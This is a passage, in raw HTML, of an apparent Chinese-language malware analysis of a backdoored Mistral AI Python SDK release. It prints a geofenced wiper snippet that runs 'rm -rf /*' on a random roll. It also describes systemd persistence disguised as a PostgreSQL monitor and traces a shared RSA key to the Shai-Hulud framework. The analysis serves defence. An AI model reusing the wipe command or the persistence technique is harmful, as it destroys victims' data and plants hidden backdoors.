0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/etc/timezone 文件内容</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/etc/localtime 二进制内容</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">LANG / LC_ALL / LC_MESSAGES 环境变量是否以 he_IL（希伯来语）或 fa_IR（波斯语）开头</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">5.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Python 系统接口 locale.getdefaultlocale() 的返回值</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这五个维度涵盖了环境变量、系统文件、locale 接口三个层面，任意一项命中就判定为目标区域。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">1/6 的死亡转盘：</span></span></p><p data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="apache"><code><span leaf=""><span class="code-snippet__attribute">roll</span> = random.randint(<span class="code-snippet__number">1</span>, <span class="code-snippet__number">6</span>) </span></code><br/><code><span leaf=""> <span class="code-snippet__attribute">if</span> _is_israeli_system() and roll == <span class="code-snippet__number">2</span>:     </span></code><br/><code><span leaf="">    <span class="code-snippet__attribute">play_at_full_volume</span>(config.RUN_FOR_COVER, <span class="code-snippet__string">&#34;RunForCover.mp3&#34;</span>)     </span></code><br/><code><span leaf="">    <span class="code-snippet__attribute">subprocess</span>.run([<span class="code-snippet__string">&#34;rm&#34;</span>, <span class="code-snippet__string">&#34;-rf&#34;</span>, <span class="code-snippet__string">&#34;/*&#34;</span>]) 	</span></code><br/><code><span leaf="">       <span class="code-snippet__attribute">return</span></span></code><br/></pre></p></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">源代码的逻辑是：如果系统被判定为以色列或伊朗，程序掷一个 1 到 6 的骰子。只有掷到 2 才会触发破坏——也就是 1/6 的概率。触发时，程序会先从攻击者服务器下载一个名为 RunForCover.mp3 的音频文件，用 pactl 把系统音量调到 100%、取消静音，然后用 mpv 开始播放。与此同时，执行 rm -rf /*。这个用最大音量播放音乐同时毁灭系统的行为模式，在实践中是一种极少见的操作。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">为什么是 1/6 而不是每次都触发？一个合理的推测是：攻击者想降低在沙箱或自动分析环境里触发破坏的概率（大多数自动系统只跑一次），但在真实受害集群中，多次感染总会触发。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">非目标区域的长期潜伏：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">如果受害者不在以色列或伊朗（绝大多数情况），程序会转而执行 deploy_local()，将持久化组件部署到系统里：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">•</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">如果你有 root 权限：写入 /usr/bin/pgmonitor.py，注册 systemd 服务 /etc/systemd/system/pgsql-monitor.service</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">•</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">如果你没有 root 权限：写入 ~/.local/bin/pgmonitor.py，注册用户级 systemd 服务 ~/.config/systemd/user/pgsql-monitor.service</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">systemd 服务配置了 Restart=always，意味着这个恶意程序会在系统重启后自动复活。文件名 pgmonitor.py 和 pgsql-monitor.service 刻意模仿 PostgreSQL 数据库监控组件，在运维环境里很容易被当作正常服务忽略。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">伪装层次总览</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">回顾整条攻击链，攻击者在三个层面都做了精心伪装：</span></span></p><table><tbody><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">层面</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">伪装成什么</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">实际是什么</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">包级别</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">正版 Mistral AI Python SDK v2.4.6（CI/CD 遭入侵）</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">带后门的正版 SDK</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">远控文件名</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">HuggingFace transformers 机器学习库</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">凭据窃取 + 擦除器</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">持久化文件名</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">PostgreSQL 数据库监控服务</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">systemd 后门</span></span></p></td></tr></tbody></table><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;margin-top: 24px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.5" data-type="png" data-w="1024" height="946" style="margin-left: 0px;" width="631" data-imgfileid="100021309" src="https://wechat2rss.xlab.app/img-proxy/?k=81374a82&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCLLIwtp3ZY23lLv4WqAbssQSVzfH3uicnxoTI32Pra8u4w3YAAyIRAojAo3olr46L2U1xjq3KY7Xk8DEJom7XfCtIKPsVTnIlics%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></h1></b></b></b></b></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;margin-top: 24px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">关联样本：同一把 RSA 公钥牵出的幕后团伙</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在对 transformers.pyz 的静态分析中，我们注意到其 config.py 硬编码了一个 4096-bit RSA 公钥。在后续的样本关联比对中，我们发现这个公钥并非首次出现——慢雾安全团队此前披露的 Shai-Hulud 供应链投毒框架（详见《</span><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504936&amp;idx=1&amp;sn=8a8f48e910d76f27242fb43e14c45590&amp;scene=21#wechat_redirect" textvalue="Shai-Hulud 恶意软件深度剖析：开源即失控 ？" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">Shai-Hulud 恶意软件深度剖析：开源即失控 ？</span></a><span textstyle="" style="font-weight: normal;">》）中，使用了</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">完全相同的 RSA 公钥</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Shai-Hulud 是一个基于 TypeScript 编写的供应链攻击框架（包名 voicefromtheouterworld）。除 RSA 公钥相同这一核心技术证据外，对比两个样本的工程结构，它们在采集模块划分、加密流程、并发调度等方面也呈现出高度相似的设计思路：</span></span></p><table><tbody><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">功能模块</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">transformers.pyz（Python）</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Shai-Hulud（TypeScript）</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">AWS Secrets Manager</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">collectors/aws.py</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">providers/aws/secretsManager.ts</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">AWS SSM Parameter Store</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">collectors/aws.py</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">providers/aws/ssm.ts</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Kubernetes Secrets</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">collectors/kubernetes.py</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">providers/kubernetes/kubernetes.ts</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 